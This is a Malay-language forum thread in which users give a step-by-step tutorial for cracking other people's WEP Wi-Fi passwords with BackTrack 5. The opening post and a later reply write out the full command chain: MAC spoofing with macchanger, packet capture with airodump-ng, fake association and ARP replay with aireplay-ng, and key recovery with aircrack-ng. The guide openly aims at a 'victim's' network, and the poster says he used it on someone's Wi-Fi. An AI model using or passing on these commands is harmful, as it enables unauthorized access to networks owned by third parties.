DAFTAR
Close
Login to Your Account
Page 1 of 5 123 ... Last
Results 1 to 10 of 50
  1. Gempak Senior
    Status
    Offline
    Join Date
    Mar 2011
    Posts
    252
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #1
    Sebelum ini ada user di sini posting macam mana nak hack wifi dengan backtrack tetapi dengan versi BT yang dahulu. Kali ini, saya akan posting pasal bagaimana nak hack wifi orang dengan mendapatkan kunci akses wifi tersebut dengan menggunakan BackTrack 5.

    1. Anda boleh dapatkan salinan linux backtrack percuma melalui website BT dan muat turun versi samada 32-bit ataupun 64-bit dengan perisa antaramuka KDE ataupun Gnome.

    2. Selepas anda muat turun, burn salinan iso dalam cd ataupun jadikan pendrive anda sebagai backtrack live usb. Rujuk panduan dalam website BT untuk membuat linux live usb.

    3. Restart PC anda dan masukkan dvd/usb backtrack dan jika pc bios anda mempunyai boot selection, sila tekan butang keyboard untuk arahan masuk ke boot selection. Cth, F11 untuk ke boot selection. Dalam boot selection pula, sila tekan pada opsyen dvd/usb boot dan tunggu sehingga muncul "boot:" dan tekan enter.

    4. Kemudian, pilihan untuk boot BT melalui pelbagai cara, memtest dan juga install BT akan muncul di skrin dan jika mahu boot dari cd, pilih antara opsyen "backtrack text boot" (yang atas sekali) dan juga backtrack stealth. Ia akan ambil masa selama 4-5 minit jadi sila bersabar. Kemudian tulis "startx" untuk boot GUI.

    5. Apabila BT sudah boot up, sila pergi ke konsole /terminal (ikon berupa command prompt) dan anda perlu menulis pelbagai sintaks arahan untuk meng'hack' wifi orang.

    6. Dalam konsole/terminal, tulis arahan untuk mendapatkan senarai antaramuka network:
    Code:
    airmon-ng
    Dan ia akan menunjukkan senarai antaramuka rangkaian dan biasanya wlan0.

    7. Kemudia, jalankan arahan seperti berikut:

    Code:
    airmon-ng stop (antaramuka)
       ifconfig (antaramuka) down
      macchanger --mac 00:11:22:33:44:55 (antaramuka)
      airmon-ng start (antaramuka)
    Jika proses ini gagal, bermakna ada terdapat kesalahan dalam sintaks arahan tersebut.

    8. Untuk melihat senarai wifi yang aktif, tulis arahan spt berikut:

    Code:
    airodump-ng (antaramuka)
    dan anda dapat melihat senarai wifi yang aktif di sekitar anda. Kemudia, tekan ctrl+c dan pilihlah mana-mana wifi milik orang untuk mencuri kata laluan wifi orang.

    9. Kemudian tulis arahan ini untuk mendapatkan info tentang wifi milik orang:

    Code:
     airodump-ng -c (channel) -w (nama wifi) --bssid (bssid) (antaramuka)
    Dalam sintaks tersebut, (channel) merupakan kod channel, ch yang digunakan oleh wifi mangsa dan bssid ialah kod wifi mangsa yang ada di sebelah kiri. Contoh bssid: 00:1F:FB:2A:C3:56.

    10. Buka konsole/terminal yang baru tanpa menutup konsole/terminal yang terdahulu dan kemudian arahan macam ini:

    Code:
    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid/ nama wifi) (antaramuka)
    Tunggu sehingga muncul "Association succesful" dengan tanda smiley.

    11. Ha.....nak dekat dah...sekarang inilah masanya untuk yang ini dan tulis seperti ini:
    Code:
     aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (antaramuka)
    Dalam proses ini, anda hanya perlu berehat sebentar selepas menjalankan arahan seperti ini. Ini kerana ia akan ambil masa selama 2-3 minit untuk mengumpul data yang cukup untuk mencuri katalaluan wifi orang. Perhatikan pada #Data pada salah satu daripada tetingkap konsole/terminal dan apabila mencapai sebanyak 30000 atau lebih, terus tekan ctrl+c untuk berhenti.

    12. Selepas proses kumpul data selesai, buka tetingkap konsole/terminal yang baru dan tulis seperti ini:
    Code:
    aircrack-ng -b (bssid) (nama wifi-01.cap)
    Jika anda tidak mempunyai data yang mencukupi, aircrack memberitahu anda supaya cuba sekali lagi dan apabila berjaya, kata "KEY FOUND" muncul dan di sebelah itu adalah katalaluan bagi wifi mangsa.

    13. Untuk menguji akses ke wifi orang, anda perlu shutdown BT dan boot windows dan cuba isikan katalaluan tanpa meletakkan simbol '[', ']' dan ':'. Bagi pengguna yang mahu untuk keluar dari BT, tekan butang naga (start) dan pilih "log out" dan ia akan kembali ke command prompt sejak anda menulis "startx' di situ dan untuk sintaks shutdown spt berikut:

    Code:
    shutdown (opsyen) (masa)
    bagi mereka yang tidak tahu bagaimana untuk membuat ini, tapikan shutdown --help dan lihat pada senarainya.

    Untuk restart, taipkan:

    Code:
    shutdown -r now
    Untuk keluar terus tanpa restart, taipkan:

    Code:
    shutdown -P now
    Selamat mencuba...

    Sumber diadaptasikan dan diubahsuai dari:


    PS: Kalau ada silap, tolong beritahu saya, dan jika ada post yang lebih kurang sama dengan yang ini, tolong check balik post yang terdahulu.

  2. # ADS
    Circuit advertisement
    Join Date
    Always
    Posts
    Many
     

  3. King Of Gempak KiuT-MiuT's Avatar
    Status
    Offline
    Join Date
    Aug 2009
    Posts
    10,838
    Post Thanks / Like
    Mentioned
    69 Post(s)
    #2
    utk yg xreti manual steps boleh pak gerix...

  4. Ame
    Gempak SuperStar Ame's Avatar
    Status
    Offline
    Join Date
    Sep 2009
    Posts
    566
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #3
    mane lebih mudah BT4 ke BT5,
    atau same jek??

    aku ade probs bile boot BT4 kat lappy aku wireless connection takbley detect/on...
    pkai wife aku punye buleh plak... aku pkai Dell Latitude D610.

  5. Gempak Senior
    Status
    Offline
    Join Date
    Mar 2011
    Posts
    252
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #4
    Ada sesetengah wireless boleh support BT dan juga adakalanya tak support. Cuba pakai yang BT5 yang terkini.

  6. King Of Gempak Lock's Avatar
    Status
    Offline
    Join Date
    Sep 2009
    Location
    celoh tiok mok
    Age
    25
    Posts
    4,387
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #5
    makk aii banyaknye kene taip..
    ~My noob RIG~ : Intel® Core™ i5-2500K 3.30GHz || ASUS Maximus IV Gene-Z/Gen3 || CM Xtreme 500W || Corsair Vengeance 8GB 1600Mhz || Sapphire HD6850 1GB || Samsung F3 1TB + Samsung F3 1.5TB || CM Hyper 212+ || Samsung B2330H || AL VS4121 || Logitech MX3200 || CM Enforcer

  7. King Of Gempak KiuT-MiuT's Avatar
    Status
    Offline
    Join Date
    Aug 2009
    Posts
    10,838
    Post Thanks / Like
    Mentioned
    69 Post(s)
    #6
    wep je nie.... pakai bt3 ke bt4 ke bt5 ke same je... aircrack-ng jugak

    Code:
    1- airmon-ng
    2- airmon-ng stop [wlan0/eth1/etc]
    3- ifconfig [wlan0/eth1/etc] down
    4- macchanger --mac 00:11:22:33:44:55 [wlan0/eth1/etc]
    5- airmon-ng start [wlan0/eth1/etc]
    6- airodump-ng [wlan0/eth1/etc]
    7- airodump-ng -c (channel) -w (file name) --bssid (bssid) [wlan0/eth1/etc]
    
    8- aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 [wlan0/eth1/etc]
    9- aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 [wlan0/eth1/etc]
    
    10- aircrack-ng -b (bssid) (filename)-01.cap
    nk senang pakai GUI.. BT5 bg byk GUI utk aircrack-ng yg plg senang gerix
    Last edited by KiuT-MiuT; 01-06-2011 at 11:55 PM.

  8. Gempak Senior
    Status
    Offline
    Join Date
    Mar 2011
    Posts
    252
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #7
    kalau yang saya tulis tadi, sape yang pernah pakai ubuntu dan juga seangkatan dengannya dan asyik main dengan terminal/konsole, orang tu takde masalah bila nak hack pakai banyak line syntax.

  9. Gempak Hardcore personant95's Avatar
    Status
    Offline
    Join Date
    Apr 2010
    Posts
    1,322
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #8
    antaramuka... interface?

  10. Gempak Senior
    Status
    Offline
    Join Date
    Mar 2011
    Posts
    252
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #9
    memanglah term macam tu...aku baca artikel asal tu, kemudian, aku buatlah pi hack wifi orang, kemudian, jadi lah...Aku tulis yang ni dalam BM sebab bagi faham sikit, ada sesetengah orang tak boleh baca artikel dalam BI, itupun ada yang malas sangat...

  11. Gempak Senior
    Status
    Offline
    Join Date
    Mar 2010
    Posts
    160
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #10
    apa kata kita cerita pasal wpa pulak ?

Page 1 of 5 123 ... Last

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

User Tag List